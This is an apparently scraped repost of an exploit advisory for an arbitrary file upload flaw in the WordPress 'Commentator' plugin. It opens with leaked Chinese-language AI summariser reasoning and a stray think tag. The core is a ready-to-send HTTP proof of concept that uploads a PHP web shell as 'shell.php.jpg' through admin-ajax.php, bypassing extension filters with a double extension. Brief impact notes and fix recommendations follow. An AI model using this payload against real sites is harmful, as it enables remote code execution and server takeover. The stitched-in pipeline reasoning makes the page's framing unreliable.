WordPress Commentator Plugin - Arbitrary File Upload
嗯,用户让我帮忙总结一篇文章,控制在一百个字以内,而且不需要用“文章内容总结”之类的开头。首先,我需要仔细阅读这篇文章,了解它的主要内容。 这篇文章看起来是关于WordPress的一个插件漏洞。标题提到了“Commentator”插件存在任意文件上传漏洞。漏洞类型是CWE-434,也就是不受限制的危险文件类型上传。攻击者可以通过admin-ajax.php中的某个动作上传恶意脚本,进而获得远程代码执行的能力。 接下来,用户提供了漏洞的描述、PoC、影响和建议。我需要把这些信息浓缩到100字以内。重点包括:插件名称、漏洞类型、攻击方式(比如使用双重扩展名绕过过滤)、可能的影响(如RCE、控制服务器)以及建议的修复措施。 现在,我得把这些点组织成一句连贯的话,确保不超过字数限制,并且直接描述内容,不加任何开头语。 </think> WordPress的"Commentator"插件存在任意文件上传漏洞,攻击者可利用双重扩展名绕过过滤机制上传恶意脚本,实现远程代码执行并控制服务器。 2026-2-14 20:32:56 Author: cxsecurity.com(查看原文) 阅读量:3 收藏

################################################################################ # Exploit Title: WordPress Commentator Plugin - Arbitrary File Upload # Date: 2026-02-05 # Exploit Author: Ahmad # Category: Webapps # Vulnerability Type: [CWE-434] Unrestricted Upload of File with Dangerous Type ################################################################################ [+] Description: The "Commentator" plugin for WordPress contains an arbitrary file upload vulnerability via the 'commentator_upload-image' action in admin-ajax.php. An attacker can bypass extension filters using double extensions (e.g., .php.jpg) to upload malicious scripts and achieve Remote Code Execution (RCE). [+] Proof of Concept (PoC): POST /wp-admin/admin-ajax.php HTTP/2 Host: TARGET_HOST Content-Type: multipart/form-data; boundary=---------------------------219582655323612 -----------------------------219582655323612 Content-Disposition: form-data; name="action" commentator_upload-image -----------------------------219582655323612 Content-Disposition: form-data; name="upl"; filename="shell.php.jpg" Content-Type: image/jpeg <?php system($_GET['cmd']); ?> -----------------------------219582655323612-- [+] Impact: An attacker can gain full control over the web server, access sensitive data, and modify the database by executing arbitrary commands. [+] Recommendations: - Implement strict file extension whitelisting. - Rename uploaded files automatically on the server side. - Disable script execution in the upload directory. -thnks to -IdiotCrew - L4663R666H05T ################################################################################



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2026020015
如有侵权请联系:admin#unsafe.sh